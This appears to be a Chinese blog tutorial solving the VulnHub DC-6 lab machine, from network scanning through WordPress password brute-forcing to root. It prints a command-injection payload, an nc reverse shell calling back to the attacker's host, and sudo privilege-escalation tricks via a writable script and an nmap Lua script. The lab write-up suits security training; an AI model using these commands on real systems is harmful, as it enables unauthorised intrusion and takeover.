枫叶
枫叶
发布于 2026-07-28 / 41 阅读
1
0

【VulnHub】渗透学习——DC-6靶机导入和详细渗透教程

导入

下载完成后在Vmware中导入。

下载地址:

官方网站:DC: 6 ~ VulnHub

夸克网盘:https://pan.quark.cn/s/e6b5b7c6524a 提取码:1jJS

信息收集

先扫描一下靶机的ip地址

nmap -sn 192.168.31.0/24

接着扫描一下开放的端口

nmap -sV -p- 192.168.31.110

开放了22和80端口。

打开浏览器看看,发现输入ip地址回车后自动跳转到了wordy,这和DC-2是相同的问题,需要修改本地的hosts文件。

vim /etc/hosts

保存后再次访问就可以了,可以看出这是wordpress的站点。

使用dirsearch扫描一下站点目录,看看有没有什么有用的东西。

dirsearch -u 'http://wordy/'

看了一下,就只有个登录页面能用上。

开始渗透

咱们现在要想办法去获取后台的账号密码,咱们使用wpscan去获取登录用户名。

wpscan --url 'http://wordy/' -e u

先把这5个用户名保存到一个文件中。

接着去获得密码字典。

DC-6的下载页面下面有这么个提示:

rockyou.txt是kali中自带的一款字典,只不过这个字典特别大,根据这个提示对这个字典进行精简。精简之前先解压这个字典,默认是压缩包形式。

#解压:
gzip -d rockyou.txt.gz
#精简:
cat /usr/share/wordlists/rockyou.txt | grep k01 > /home/kali/Desktop/password.txt

我将精简后的字典放到了桌面上。

接着就可以用wpscan进行暴破。

wpscan --url 'http://wordy/' -U /home/kali/Desktop/1.txt -P /home/kali/Desktop/passwords.txt
#/home/kali/Desktop/1.txt是前面保存的用户名的文件

成功暴破出来一个用户,咱们登录到后台去看看。

登录成功,咱们找找哪里能被咱们利用。

发现这个页面下存在Linux的命令执行,咱们试试用bp抓包后修改命令看看行不行

把ip地址换成127.0.0.1 | whoami试试,看看能不能显示出是哪个用户。

成功显示了,那咱们只需要在这里使用nc来反向shell就行了。

先在终端中提前打开监听

nc -lvvp 4444

接着修改命令发送就行。

nc 192.168.31.201 4444 -e /bin/bash

成功后就可以连到shell 。

使用python获取一个可交互的shell。

python -c 'import pty; pty.spawn("/bin/bash")'

接着就找找有没有什么有用的文件。

在/home/mark/stuff中找到一个文件,文件中显示了graham用户的密码。

使用ssh连接,用graham用户,或者直接su - graham切换用户。

在这个用户中输入sudo -l后显示了一个备份的脚本,咱们可以利用这个脚本.

先cd到这个脚本目录下,接着输入下面的命令

echo "/bin/bash" >> backups.sh

输入完后cat一下确认有没有写入。

写入成功后执行这个命令,但是提示不能使用当前用户运行。

使用jens用户执行这个文件。

sudo -u jens ./backups.sh
image-RjeC.png

执行完成后切换到了jens用户。继续sudo -l看看可以执行哪些命令。

执行完成后发现可以使用nmap,询问AI后得知nmap也可以运行文件,那就可以写一个root的shell文件让nmap运行。

# 写入标准lua调用os.execute
echo 'os.execute("/bin/bash")' > /tmp/pwn.nse
sudo nmap --script /tmp/pwn.nse

执行完成后就进入了root用户。但是我这里遇到一个bug,输入字符后不显示,但是回车后显示出来了,不知道是什么问题。

进入/root目录读取flag文件,结束!


评论